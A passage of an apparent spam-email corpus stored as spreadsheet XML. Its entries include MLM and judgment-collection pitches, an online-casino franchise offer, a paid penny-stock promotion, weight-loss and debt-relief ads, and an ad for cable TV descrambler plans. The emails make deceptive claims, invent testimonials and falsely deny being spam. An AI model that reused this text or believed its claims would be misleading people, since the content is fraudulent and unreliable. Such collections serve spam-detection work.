has ever landed in your Inbox.MULTI-LEVEL MARKETING IS A HUGE MISTAKE FOR MOST PEOPLEMLM has failed to deliver on its promises for the past 50 years. The pursuit 
of the "MLM Dream" has cost hundreds of thousands of people their friends, 
their fortunes and their sacred honor. The fact is that MLM is fatally 
flawed, meaning that it CANNOT work for most people.The companies and the few who earn the big money in MLM are NOT going to 
tell you the real story. FINALLY, there is someone who has the courage to 
cut through the hype and lies and tell the TRUTH about MLM.HERE'S GOOD NEWSThere IS an alternative to MLM that WORKS, and works BIG! If you haven't yet 
abandoned your dreams, then you need to see this. Earning the kind of income 
you've dreamed about is easier than you think!With your permission, I'd like to send you a brief letter that will tell you 
WHY MLM doesn't work for most people and will then introduce you to 
something so new and refreshing that you'll wonder why you haven't heard of 
this before.I promise that there will be NO unwanted follow up, NO sales pitch, no one 
will call you, and your email address will only be used to send you the 
information. Period.To receive this free, life-changing information, simply click Reply, type 
"Send Info" in the Subject box and hit Send. I'll get the information to you 
within 24 hours. Just look for the words MLM WALL OF SHAME in your Inbox.Cordially,SiddhiP.S. Someone recently sent the letter to me and it has been the most 
eye-opening, financially beneficial information I have ever received. I 
honestly believe that you will feel the same way once you've read it. And 
it's FREE!
------------------------------------------------------------
This email is NEVER sent unsolicited.  THIS IS NOT "SPAM". You are receiving 
this email because you EXPLICITLY signed yourself up to our list with our 
online signup form or through use of our FFA Links Page and E-MailDOM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
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t>NEW PRODUCT ANNOUNCEMENTFrom: OUTSOURCE ENG.&amp; MFG. INC.
Sir/Madam;This note is to inform you of new watchdog board technology for maintaining
continuous unattended operation of PC/Servers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application's
source code is no longer needed.Here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monitoring.A lock up of the operating system or if any one of the selected
applications is not running, the MAM feature, in
conjunction with the Watchdog, will reset the system allowing for
continuous operation.It's that simple!Watchdog Control Center is supported on most Microsoft Windows platforms
(Win9x/WinNT/Win2k) and includes a Linux version for PCI Programmable
Watchdogs.Watchdog Control Center Features:
- Automated installation
- Controls all Outsource Engineering Watchdogs
- User selectable Watchdog timeout period
- User selectable Watchdog stroke interval
- Multiple Application MonitoringIncluded on the Installation CD:
- Watchdog Control Center
- Watchdog Drivers
- DocumentationFor more information, please visit out website at
http://www.outsrc-em.com/ or send an e-mail to sales@outsrc-em.com</t>
  </si>
  <si>
    <t xml:space="preserve">
 Thank you for your interest! 
 Judgment Courses offers an extensive Audio training
course in 
 "How to Collect Money Judgments"
  .          S6 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 Money
Judgment debt
  . For every Judgment that is paid, 5 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 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
 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 Your
professionalism in both the manual and the video opened
doors for me in the future. There's no stopping me now.
Recently Thomas states he has over $8,500,000 worth of
judgments he is working on.After only having this course for four months, Larry S. in
area code 314 stated to us: " 
 I am now making $2,000.00 per
week 
 and expect this to grow to twice this amount within the
next year. I am having a ball. I have over $250,000 in
judgments I am collecting on now."After having our course for 7 months Larry S. in 314 stated
"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
 Please call us at 1_406_652_0194 
 .We have 
 Customer Support staff available to you from 8:00am to
9:00pm (Mountain Time) 7 days a week
  . If you call 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
T h i s message i s produced a n d sent out by:
Universal S.y.s.t.e.m.s.
To be dropped form our mailing list please email us at 
james77@mail.asia-links.com call us toll free at 1=888=605=2485
and  g i v e us y o u r email a d d r e s s  or w r i t e  us a t:
*Central*DB*Processing, PO: Box:1200, O r a n j e s t a d, Aruba
.....................................................................   
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 </t>
  </si>
  <si>
    <t xml:space="preserve">Internet Service 
Providers
Â 
We apologize if this is an unwanted email. We 
assure you this is a one time mailing only.
We represent a marketing corporation interested in buying an ISP or 
partnership with an ISP. We want to provide services for bulk friendly hosting 
of non-illicit websites internationally. We seek your support so that we may 
provide dependable and efficient hosting to the growing clientele of this 
ever-expanding industry. Consider this proposition seriously. We believe this 
would be a lucrative endeavor for you. Please contact dockut3@hotmail.com soon for further discussion, 
questions, and problem solving. Sincerely.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Yes we do purchase uncollected Judicial Judgements!!!            st10                           .           If you, your company or an acquaintance have an uncollected Judicial Judgement then please call us and find out how we can help you receive the money that the court states you are rightfully due.We have strong interest in acquiring uncollected Judicial Judgements in your City and Area.J T C is the largest firm in the world specializing in the purchase and collection of Judicial Judgements.Currently we are processing over 455 million dollars worth of judgements in the United States alone. We have associate offices in virtually every city in the US and in most foreign countries.You have nothing to lose and everything to gain by calling. There is absolutely no cost to you.We can be reached Toll free at 1-888-557-5744. in the US or if you are in Canada call 1-310-842-3521. You can call 24 hours per day.Thank you for your time.++++++++++++++++++++++++++++++++++++++++++++++++++++
This ad is produced and sent out by: Add Systems,  NY, NY 1 1 2 2 2. To be  r e m o v e d from our mailing list please email us at boogins@hiphopmaster.com  with r e m o v e in the subject.
++++++++++++++++++++++++++++++++++++++++++++++++++++
***********************************
9385</t>
  </si>
  <si>
    <t xml:space="preserve">OWN YOUR VERY OWN FREE CASINO AND SPORTSBOOK!             EARNING POTENTIAL: $75-$150,000 + YEARLY  P/T!! Toll Free: 1-866-522-8575 24hrs. International calls: 1-954-610-9386 Ted Koppel, Nightline...
"Not only is Internet Gambling already possible, already a modestly thriving Industry, it promises to become huge" 
We create your very own Online Casino and Sportsbook Absolutely FREE!!
You Receive the Highest Payouts! 25-50%, With Lifetime Residuals!     
Our marketing tools assist you in easily generating revenue .100 people losing just $500 a month in your casino gives you $25,000 a month!!!
*If you are one of the first 25 people to call today, Receive a FREE marketing package!                       
*Available in a limited number of area codes throughout the USA.
*AVAILABLE ON A FIRST COME FIRST SERVE BASIS IN  YOUR AREA.   Toll Free 1-866-522-8575 24hrs. International calls: 954-610-9386 or email your name and phone number to: mailto:respond_to_dave@excite.com?subject=More-Info-$$$
U.S. News and World report on Internet gambling: "A gold rush in Cyberspace." 
PAYOUT SCHEDULE: You receive 25-50% of the monthly Net Cashout (the cumulative loss of all players). 
1. Internet use is continuing to explode! It is estimated that a million new people every day are joining 
the hundreds  of  millions already on-line.   2. Legalized gaming has become the top revenue earner for all forms of entertainment in the U.S. today. 
Your Winnings $10,000 = You earn $5,000 $25,000 = You earn $12,500 $50,000 = You earn $25,000 
$100,000 =You earn $50,000NO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1997 $0.30 billion 1998 $0.65 billion 1999 $1.17 billion 2000 $2.89 billion 2001 $5.72 billion 
2002 $9.17 billion source: Christiansen/Cummings Associates, Inc. Here's an interesting statistic: A typical better loses $500 per week. Do The Math!
Do not wait, we are poised for success, and looking for people to share in that success!Contact us today: Toll Free 1-866-522-8575 24hrs. International calls: 954-610-9386   Or Email your name and phone number along with the best time to reach you. 
mailto:respond_to_dave@excite.com?subject=More-Info-$$$
Why we're "IN THE NEWS" Every gambler knows that the house always wins in the long run. 
As Steve Wynn once famously said, "the only way to make money in a casino is to own one" 
"I made $73,589.00 in my first 6 months, and will double that this time around" J.Barnes, Norfolk, VA 
"We believe our projections of Internet gambling revenues of $100 to $200 Billion domestically and 
$200-$400 Billion in the rest of the world is reasonable, even conservative." The Baker Report
"We didn't realize how many people in our area gambled on-line until we received our first check for 
$39,789.54" Steve Rhodes, PA. 
"As an entertainer, I look at the Internet as the future venue for many forms of entertainment. It is a 
powerful way to bring fun and safe entertainment to millions of people at the same time."  
Country Singer and online casino owner, Kenny Rogers 
"I was amazed at the number of friends and family that are playing on my Casino, last month I earned over $11,400" 
Dave P. IL 
"There's no doubt you are dealing with hundreds of Billions of dollars... the amount of money we're talking 
is astronomical." -Wisconsin Attorney General James Doyle on Internet gambling 
"I have over 500 players a month at my casino right now and I am already starting your 65% program" MD. WI. 
"Net traffic is doubling every 100 days." U.S. Commerce Department 
"On-line gambling turnovers have the potential to dwarf those of other interactive services, tapping into an existing 
traditional gambling market valued at over $700 Billion in Europe alone." Data monitor, a market analyst corporation.
PC Computing Magazine has conservatively estimated that the US Internet gaming market could soon reach $20 billion 
in annual revenue. =============================================================================
REMOVAL INSRTUCTIONS: CLICK HERE mailto:loan75@uol.com.co?subject=Remove-CAS
 </t>
  </si>
  <si>
    <t xml:space="preserve">China's rapid economic growth, as ranked by the World Bank, is TEN TIMES 
FASTER than the world economy. The only thing US investors should be asking themselves is, "How can I 
participate in this explosion?" We have the answer. Texas-based 
CommunicateNow.com, Inc. (OTC BB trading symbol: CMNW) may unlock 
China's amazing potential.INVESTOR'S TIMING OPPORTUNITYTexas-based CommunicationsNow.com Inc. (OTCBB trading symbol: CMNW) 
announces today that a top representative from CMNW will be traveling to 
China in an attempt to negotiate with one of China's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history.Opening China's DoorUsing hard-won experience gained in the survivor-takes-all US Internet market, 
CMNW developed technology that makes it possible for China's millions of 
entrepreneurs, small and medium sized companies, and major corporations to 
do business worldwide via the Internet. Chinese makers of porcelain, for 
example, can deal direct with US consumers and retailers. Say "goodbye" to 
the layers of middlemen.CMNW strives to become a World Wide Wholesaler CMNW is attempting to become an International wholesaler to the world. This
is an enormous goal. Many believe that trade with China built the world's greatest
fortunes, from the golden age of Venice to the British Empire. Now this potential
is being transferred to the Internet, and CMNW will attempt to capture it.CMNW puts all this into your portfolio: stability of a US-based company... 
sky-rocketing China market...convenience of a US-listed stock...dynamics of 
a growth company. *** For the latest quarterly report on CMNW, go to www.freeedgar.com *** Obviously, you cannot go back in time to the year 1901 and invest in baby US 
companies like Coca-Cola and Johnson &amp; Johnson as they were getting started. 
But you can grab the modern day equivalent. That's right. The growth 
potential in China at this very minute is like the United States at the start 
of the 20th century -- perhaps even greater. There's much more to the CMNW story. Including a major expansion into Mexico. To SUBSCRIBE to the future communications, please click on this link and hit send:
mailto:abc111@uole.com.ve?subject=INFO-CMNW================================================================= 
Please double click on the below link to be excluded from further communication. 
mailto:def222@uole.com.ve?subject=delete-CMNW 
=================================================================DISCLAIMER: Network Media Services provides an e-mail delivery service on behalf of securities 
issuers and publishers that circulate information about a company or the companyï¿½s securities. 
Network Media Services has received twenty thousand shares of the common stock of 
CommunicateNow.com, Inc.as payment to circulate this report via electronic mail to e-mail
addresses contained in Network Media Services database. To read entire disclaimer please
click here: http://members.tripod.de/mani20/index1.html/
</t>
  </si>
  <si>
    <t xml:space="preserve">Unbelievable Prices On Cell Phones And Accessories:http://www.chinaniconline.com/sales/Hands Free Ear Buds 1.99! 
Phone Holsters 1.98! 
Phone Cases 1.98! 
Car Chargers 1.98! 
Face Plates As Low As 2.98! 
Lithium Ion Batteries As Low As 6.94! http://www.chinaniconline.com/sales/Click Below For Accessories On All NOKIA, MOTOROLA LG, NEXTEL, 
SAMSUNG, QUALCOMM, ERICSSON, AUDIOVOX PHONES At Below 
WHOLESALE PRICES!
http://www.chinaniconline.com/sales/***NEW*** Now Also: Accessories For PALM III, PALM VII, 
PALM IIIc, PALM V, PALM M100 &amp; M105, HANDSPRING VISOR, COMPAQ iPAQ*** Car Chargers 6.95! 
Leather Cases 13.98! 
USB Chargers 11.98! 
Hot Sync Cables11.98! http://www.chinaniconline.com/sales/***If You Need Assistance Please Call Us  (732) 751-1457***~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To be removed from future mailings please send your remove 
request to: removemenow68994@btamail.net.cn 
Thank You and have a super day :)
</t>
  </si>
  <si>
    <t xml:space="preserve">More Than $2500 in DEBT?We Can Help You PAY-OFF Your BILLS!!
Click here for your FREE Consultation!!
http://mysprintfast.com/web/debtfreedom/index1.html~Cut your monthly payments by 50% or even more...
~Stop paying Creditors high interest rates?
~Better Manage your Financial Situation...Keep More Cash every Month!
~We can Help STOP any Creditor Harassment!
~Consolidate Regardless of past Credit History!Quick - Confidential - No Obligations -
Click on the link below to get started!!
http://mysprintfast.com/web/debtfreedom/index1.html~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~To be removed from all further mailings, 
please send a message to: 457remove@webs.mysprintfast.com 
We honor all remove requests.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Dear Friend,This last summer, our family had a big reunion at a fabulous resort in 
Minnesota. Â The water was sapphire blue and the evergreens sang as the 
breeze rustled their limbs. Â We had such a great time renewing old 
friendships, seeing how everyone's children had grown, and catching up on 
everyone's lives. Â The last day we had a family picture taken, thinking 
that we'd all send them out as our Christmas cards.In October we got the proofs back so that we could pick our favorite picture. 
Everybody looked wonderful and the background was spectacular but I could not 
find myself in the picture. Â I looked and looked and finally got out a 
magnifying glass. Â To my horror, I found this dark curly headed woman 
with a face that looked like a stretched moon!!! Â Dear God it was me!!! 
Â My body resembled an inflated hot air balloon that would take off should 
a heavy wind arise... it was HIDEOUS! Â I had mirrors in my house but most of them were 
designed to only reflect Â from the waist up and I honestly hadn't noticed 
that my cheekbones had totally disappeared and that my face looked like a 
shapeless clump of flesh. Â I was always so happy that I didn't have a lot 
of wrinkles, Â but I didn't realize that I wasn't wrinkled because my skin 
was as stretched as tight as a bongo drum.Well, this situation was NOT  acceptable. Â But I was at a loss as to what to do. 
Â My willpower, well, basically sucks and I had so-o-o much weight to lose 
that I wasn't sure I'd live long enough to get it all off. Â Plus, I hate 
diets and can only stick to them for a very short period of time before I fall 
off the food wagon. Â My goal to slim down seemed totally hopeless.AND THEN 
IT HAPPENED. Â I received a brochure about a product called 
BERRY TRIM 
PLUS. Â It seemed to contain everything I needed. Â 
It curbs your appetite, increases energy, burns fat at the fastest rate 
possible, no special diets are required, you don't have to exercise like a 
lunatic, it doesn't make you feel speeded, Â AND IT 'S ALL NATURAL WITH NO 
ADVERSE SIDE EFFECTS. Â It also was priced well below other products so 
I figured that if it didn't work I wouldn't be out much money. Â It is 
guaranteed, but I'm always too lazy to bother to send back the empty bottles 
so this diet supplement seemed perfect for me.It's been about 6 weeks now but I swear I'm beginning to look like that 
famous Cindy person that models. Â My cheekbones are absolutely glorious.. 
I swear I look like a new person and a good one at that. Â BERRY TRIM 
PLUS  also keeps your skin tight so you don't look like a 
Shar Pei with nasty folds of skin hanging all around after you lose the weight.
I promise you that this product works. Â It does everything it promises 
and then some. Â Just losing the weight alone, makes you feel so much 
better and younger. Â It puts zest back into your life and assures you 
that you'll achieve your weight loss goals. Â In another few weeks I will 
reach my goal...something I had given up on. Â Also, HLNA  offers an affiliate 
program so you might as well make a few bucks while losing those pounds.
Please keep the faith and order this product NOW  by clicking below.CLICK
HERE
Sincerely,
LaurieThis message is brought to you by BerryTrim Affiliate#
3b3773c002ce47b
We apologize for any email you may have
inadvertently received.
Please CLICK HERE to be removed 
from
future mailings.</t>
  </si>
  <si>
    <t>&lt;!--
function Filtered()
{
return 0
}
//--&gt;Do You Have $5000 or More in Debt?Now you can "regardless of your past credit history"â€¢Â  Cut your monthly payments by 50% or more!â€¢Â  Reduce your credit card debt by up to 60%!â€¢Â  Slash your interest rates down to [as low as] zero!â€¢Â  Keep More Cash every month!â€¢Â  Stop creditors from harassing you now!â€¢Â  Much Much More...
NO OBLIGATION â€¢ FREE CONSULTATION â€¢ STRICT PRIVACYClick Here and Include YourName, Phone Number and Amount of Debt
Remove from Mailing List-_-_-_-_-_-_-_-_</t>
  </si>
  <si>
    <t xml:space="preserve">oo Thank You, Your email address was obtained from a purchased list, 
            Reference # 2020&amp;MID=3300.Â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33155".Â© 2002 
            Web Credit Inc. All Rights Reserved.
</t>
  </si>
  <si>
    <t xml:space="preserve"> 
                 FOLLOW ME TO FINANCIAL FREEDOM!!I Am looking for people with good work ethic and extrordinary desire
 to earn at least $10,000 per month working from home!NO SPECIAL SKILLS OR EXPERIENCE REQUIRED We will give you all the 
training and personal support you will need to ensure your success!This LEGITIMATE HOME-BASED INCOME OPPORTUNITY can put you back in
               control of your time,your finances,and your life!If you've tried other opportunities in the past that have failed to 
               live up their promises,     THIS IS DIFFERENT THEN ANYTHING ELSE YOU'VE SEEN!       THIS IS NOT A GET RICH QUICK SCHEME!YOUR FINANCIAL PAST DOES NOT HAVE TO BE YOUR FINANCIAL FUTURE!               CALL ONLY IF YOU ARE SERIOUS!                 1-800-345-9708     DONT GO TO SLEEP WITHOUT LISTENING TO THIS!"ALL our dreams can come true- if we have the courage to persue them"
                   -Walt DisneyPlease Leave Your Name And Number And Best Time To Call               DO NOT RESPOND BY EMAILThis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t>
  </si>
  <si>
    <t xml:space="preserve">
Lender's Network
A:hover {color: #FF0000}
The Lenders Network!
 Where mortgage lenders compete for your business!
Current Information For&lt;!--// Beginvar months=new Array(13);months[1]="January";months[2]="February";months[3]="March";months[4]="April";months[5]="May";months[6]="June";months[7]="July";months[8]="August";months[9]="September";months[10]="October";months[11]="November";months[12]="December";var time=new Date();var lmonth=months[time.getMonth() + 1];var date=time.getDate();var year=time.getYear();// Y2K Fix by Isaac Powell// http://onyx.idbsu.edu/~ipowellif ((navigator.appName == "Microsoft Internet Explorer") &amp;&amp; (year &lt; 2000))year="19" + year;if (navigator.appName == "Netscape")year=1900 + year;document.write("&lt;center&gt;" + lmonth + " ");document.write(date + ", " + year + "&lt;/center&gt;");// End// --&gt;      The "Lenders Network" is a 100% FREE TO BUYER Service.  Fill in our 
5 Minute quote request form and we will instantly submit your loan request to      our competing lenders!The      financial experts comprising the "Lender's Network" represent hundreds of loan programs, 
including  purchase loans
refinance
debt
              consolidation
home improvementÂ 
second mortgages
no income
              verification
Our Network of Lenders are Licensed and Registered to do business in all 50 U.S. States.  You will often be contacted with an offer the very same day you fill out the form!
NEVER SETTLE FOR A SINGLE QUOTE!
 You can save Thousands Of Dollars over the course of your loan with just a 1/4 of 1% Drop in your rate!  The information you provide to
our extensive database of Financial Experts will result in offer's meeting the exact criterion you requested.
Get MULTIPLE OFFER'S and get the loan you want....and DESERVE!
Please
complete this form.
Our loan specialist will be contacting you at your convenience.
Thank You. &lt;!-- function validate_form() {validity = true; // assume validif (!check_empty(document.form.Name.value)){ validity = false; alert('Name field is empty!'); }if (!check_empty(document.form.HPhone.value)){ validity = false; alert('Home Phone field is empty!'); }if (!check_empty(document.form.PropertyValue.value)){ validity = false; alert('Property Value field is empty!'); }if (!check_empty(document.form.PurchasePrice.value)){ validity = false; alert('Purchase Price field is empty!'); }if (!check_empty(document.form.YearAcquired.value)){ validity = false; alert('Year Acquired field is empty!'); }if (!check_empty(document.form.Mortgage1.value)){ validity = false; alert('First Mortgage Balance Field is empty!'); }if (!check_empty(document.form.CurrentIntRate.value)){ validity = false; alert('First Mortgage Interest Rate field is empty!'); }if (!check_empty(document.form.BorrowRequest.value)){ validity = false; alert('Amount You Wish To Borrow field is empty!'); }if (!check_empty(document.form.MonthlyGrIncome.value)){ validity = false; alert('Gross Monthly Income field is empty!'); }(validity)alert ("Thank you for your registration! "+ "Your form is now being passed to your browser's "+ "Mail Delivery Sub-System for NORMAL"+ " NON-ENCRYPTED email delivery."+ " All email addresses are removed from our system"+ " upon registration. Please click OK to proceed");return validity;}function check_empty(text) {return (text.length &gt; 0); // returns false if empty}// --&gt;
Â Contact
        Information: * Required Info
Name:
*
Address:
*
City:
*
State
        (USA Only):AK
          Â 
          AR
          Â 
          AZ
          Â 
          CA
          Â 
          CO
          Â 
          CT
          Â 
          DC
          Â 
          DE
          Â 
          FL
          Â 
          GA
          Â 
          HI
          Â 
          IA
          Â 
          ID
          Â 
          IL
          Â 
          IN
          Â 
          KS
          Â 
          KY
          Â 
          LA
          Â 
          MA
          Â 
          MD
          Â 
          ME
          Â 
          MI
          Â 
          MN
          Â 
          MO
          Â 
          MS
          Â 
          MT
          Â 
          NC
          Â 
          ND
          Â 
          NE
          Â 
          NH
          Â 
          NJ
          Â 
          NM
          Â 
          NV
          Â 
          NY
          Â 
          OH
          Â 
          OK
          Â 
          OR
          Â 
          PA
          Â 
          RI
          Â 
          SC
          Â 
          SD
          Â 
          TN
          Â 
          TX
          Â 
          UT
          Â 
          VA
          Â 
          VT
          Â 
          WA
          Â 
          WI
          Â 
          WV
          Â 
          WYÂ 
          Â 
        *
Zip/Postal
        Code:
*
Home
        Phone:Â 
*
Work
        Phone:
*
Email
        Address:
*
Best
        Time to Call:Morning at Home
          Â 
          Morning at Work
          Â 
          Afternoon at Home
          Â 
          Afternoon at Work
          Â 
          Evening at Home
          Â 
          Late Evening at Home
          Â 
Do
            You Own Your Home?:Yes
              Â 
              No
              Â 
            Mobile
            Homes DO NOT Qualify
Property
            Value:
*
Property
            Type:Single Family
              Residence
              Â 
              Condo
              Â 
              Townhouse
              Â 
              2-4 Plex
              Â 
              Other
              Â 
Purchase
            Price:
*
Year
            Acquired:
*
1st
            Mortgage Balance Owed:
*
1st
            Mortgage Interest Rate:
*
Is
            1st Adjustable or Fixed?:Fixed
              Â 
              Adjustable
              Â 
            *
2nd
            Mortgage Balance Owed:Amount
            You Wish To Borrow:
*
Employer:Monthly
            Gross Household Income:
*
Monthly Debt::Â 
Credit
            Rating:Please Select
Good
              Â Â 
              Fair
              Â 
              Poor
Excellent
              Â 
            *
Loan
            Interested In:Debt Consolidation
              Â 
              Second Mortgage
              Â 
              Home Improvement
              Â 
              Refinance
              Â 
              Purchase
              Â 
            *
Â Removal
Instructions
Click on the below link to be excluded from further communication.
Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve">
So you still donCrystal Clear Connection With Unlimited 
	 Long Distance Usage For One Low Flat Rate!Â 
Â 
Now 
      try it  for FREE!!*Â See for 
      yourself.
We'll activate 
      your Flat Rate Unlimited Long Distance Service for 1 week FREE* to prove 
      that the quality of service is what you 
      expect.Â 
Call now! Operators standing 
      by to activate your service.
Toll Free:877-529-7358Monday through Friday 9am to 9pm 
        EDT
For More Information:Your 
            Name:
City:
State:
Daytime 
            Phone:
Nighttime 
            Phone:
Email:
Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  
*One week free 
      offer is valid to those who have a valid checking account. Service is 
      never billed until after the 1 week free trial 
      period.Â 
If you have received this by error or wish to be 
removed from our mailing list, please click 
here 
</t>
  </si>
  <si>
    <t xml:space="preserve">
1) Disney/Orlando Vacation
Roundtrip Airfare included for 2 people in all 50 States: Only $4992) Las Vegas Vacation
Roundtrip Airfare included for 2 people in all 50 States: only $4993) 8 Days 7 Nights in Hawaii (condo resort)
No Airfare included:                                      only $3494) 8 Days 7 Night Bahamma Vacation
Roundtrip Airfare included (only from the following cities: Baltimore, 
Richmond, Cincinnatti, Raleigh, Memphis, Nashville, Hartford, Cleveland, Pittsburg, Ft. Lauderdale ) only $549
combo packages (Free Gift with Every Purchase):
1) Any 2 of these trips: only $749
2) Any 3 of these trips: only $869
3) All 4 trips: only $899(all trips include $100's in discounts, 2 for 1 deals)To Order Please call: 1-800-909-6268
All Discount Packages are Sold on a First Come, First Serve Bases. Limited Supply Availible.To be removed From future mailings reply to cyndijo@casa.as
</t>
  </si>
  <si>
    <t xml:space="preserve">
Mortgage Rates are at an all time low.  We can find ANYONE with ANY CREDIT (great or horrible)
the lowest and most competitive rates.  Simple takes under 1 minute.TRY NOW
512517
</t>
  </si>
  <si>
    <t xml:space="preserve">
OPRAH, NIGHTLINE, MARIA SHRIVER, 48 HOURS, 20/20, 
PLAYBOY, KIPLINGERS and more have all interviewed this 
FAMOUS Private Investigator, seeking to find how he made 
his fortune.  Take a moment and learn his long sought after SECRETS.This PI is the originator of seeking out Judicial Judgments and using 
them to make a FORTUNE!  Most people have no idea what a 
Judicial Judgment is, much less how to process them to earn a very 
substantial income.Hereï¿½s the SCOOP-  When one person or business files suit against 
another and wins, the winner then has a JUDICIAL JUDGMENT.
BUT, even though they won- guess what? They soon find out these 
SHOCKING FACTS:a)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peopleï¿½s judgments?  Thatï¿½s what we want to tell you.  
Through long and hard work, this Sleuth has learned a 
process that will turn these forgotten useless pieces of paper 
into a FORTUNE without the high collection cost.The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ï¿½on the sideï¿½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make!If you've ever dreamed the American Dream financial freedom 
this may very well be the opportunity youï¿½ve been looking for.  
This business can also protect you from corporate downsizing. 
It might also be your ticket to freedom from others telling you what
to do. This business lets you control your destiny! You donï¿½t need 
to be a rocket scientist either! Our training has made this happen for 
many others already. Make it happen for you too!Take the first step and talk it over with one of our trained 
counselors by calling 1-720-733-7315.  Let them answer your 
questions so that youï¿½ll know if itï¿½s right for you.  There is no cost 
or obligation on your part except the cost of a phone call.  Join a small number of people who are reaping the BIG 
REWARDS, by calling us at 1-720-733-7315 today!</t>
  </si>
  <si>
    <t xml:space="preserve">  NOTE: THIS IS AN ADVERTISEMENT FOR LEGAL TV
   DE-SCRAMBLER IF YOU HAVE NO INTEREST IN THIS INFORMATION
PLEASE CLICK DELETE NOW.  THANK YOU--
 LEGAL CABLE TV DE-SCRAMBLERWant to watch Sporting Events?--Movies?--Pay-Per-View??*This is the Famous R-D-O Shack TV Descrambler
You can assemble it from R-D-O Shack parts for about $12 or $15.We Send You:
E-Z To follow Assembly Instructions.
E-Z To read Original Drawings.
The Famous R-D-O Shack Parts List.PLUS SOMETHING NEW YOU MUST HAVE!Something you can't do without.THE UP-TO-DATE REPORT: USING A DESCRAMBLER LEGALLYWarning: You should not build a TV Descrambler without 
reading this report first.Frequently Asked Questions--CABLE TV DESCRAMBLERQ: Will the descrambler work on Fiber, TCI, Jarrod 
and satellite systems? 
A: The answer is YES.  In respect to satellite, 
you just get more stuff! There is one exception:
 The descrambler will not work with DSS satellite.Q: Do I need a converter box?
A: This plan works with or without a converter box.
  Specific instructions are included in the plans for each!Q: Can the cable company detect that I have the descrambler?
A: No, the signal descrambles right at the box and does
   not move back through the line!Q: Do I have to alter my existing cable system, 
television or VCR?
A: The answer is no!Q: Does this work with my remote control?
A: The answer is yes.  The descrambler is 
manually controlled--but very easy to use!Q: Can you email me the plans?
A: No the program comes with an easy to follow picture guide.Q: Does this work everywhere across the country?
A: Yes, every where in the USA plus England,
 Brazil, Canada and other countries!Q: When I order, when will I get my stuff?
A: We mail out all orders within 48 hours of receiving them. YOU SUPPLY A SELF-ADDRESSED, STAMPED, #10 LONG ENVELOPE, WITH
TWO-FIRST CLASS STAMPS.
Q: How much does it cost to get the instruction 
plans, the easy to follow diagram, and most
 important of all the Using a Descrambler LEGALLY. 
A: You get the complete package all for just--$10.00
 (Cash, Check or Postal Money Order.)
(Arizona residents include 7% Arizona State Sales Tax)(All orders outside the U.S.A. add $5.00)ORDERS OUTSIDE THE US MUST BE IN $15 in US CASH!Q: How do I order?
A: Fill out form below and send it, along with your payment 
   AND YOUR SELF ADDRESSED 2 STAMPED ENVELOPE to:
A Groves
PO BOX  8051
Mesa, AZ  85214-8051
 MAKE CHECKS PAYABLE TO:  A Groves
PRINT YOUR:
       (orders without an envelope or stamps will be processed
        up to 2 weeks later than complete orders)    DO NOT FORGET YOUR STAMPS! NAME_____________________________________________ADDRESS__________________________________________CITY/STATE/ZIP_____________________________________DO NOT FORGET YOUR 2, 33 or 34 cent stamps and #10 envelope!*A GROVES is NOT ASSOCIATED in any way with RADIO SHACK. 
 Neither the design nor instructions were developed
 by, are sold by, or are endorsed by Radio Shack. 
 Parts for this fine-tuning device are available 
 at many electronics stores (including Radio Shack) 
 This is not a Radio Shack product.
to be removed reply to: gotcha3490@looksmart.com.au
</t>
  </si>
  <si>
    <t xml:space="preserve">
Talk on Tele  with locals in your area who want to meet for real encounters. 
 No pre recorded bull this is the real deal.
US residents: the 900-370-5465 or  888-400-1919. - 99
 cents / min
For CA callers try our special California  line, California is so popular we had to create a seperate system just for them: 1-900-505-7575.must be 18+ be careful when making sexual dates and meetings. Cali 900# is $1.99 per min211075433222
</t>
  </si>
  <si>
    <t xml:space="preserve">
--646007810.993513231406.JavaMail.RovAdmin.rovweb002
Content-Type: text/plain; charset=iso-8859-1______________________________________________________Your Membership Exchange Issue #422   &lt;&gt;   06-25-01Your place to exchange ideas, ask questions, swap links, and share your skills!____________________________________________________________________________________________________________You are a member in at least one of these programs - You should be in them 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 Special Announcement:We can help you become an Internet Service provider within 7 daysor we will give you $100.00!!   http://www.SELLinternetACCESS.comclick hereWe have already signed 300 ISPs on a 4 year contract, see if anyare in YOUR town at:  http://www.Find-Local-ISP.com click here____________________________________________________________________________________________________________Be sure to examing today's Showcases for sites who WILL trade links with you!&gt;&gt; RESOURCE BOARD     P. Steeves: Internet Explorer Hint w/ "Image Toolbar"&gt;&gt; Q &amp; A     QUESTIONS:      - Unblocking sites so I can access?&gt;&gt; MEMBER SHOWCASES&gt;&gt; MEMBER *REVIEWS*     - Sites to Review: #122 &amp; #123!     - Three New Sites to Review!     - Site #121 Reviewed!     - Vote on Your Favorite Website Design!______________________________________________________&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; RESOURCE BOARD &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;Subject: Internet Explorer Hint w/ "Image Toolbar"I updated to Internet Explorer Version: 6.00.2462.0000 a fewweeks ago. I am now receiving less BOMBS when I am on-line;therefore, I believe it is better than the last version.There is, though, one little agonizing message "Image Toolbar"that pops up every time you pass the mouse over an image.It asks whether you want to save or print the image. UGH,what a pest.Hurrah, you can get rid of the Image Toolbar. Justperform a Right Mouse Click over the Image Toolbar.It will allow you to 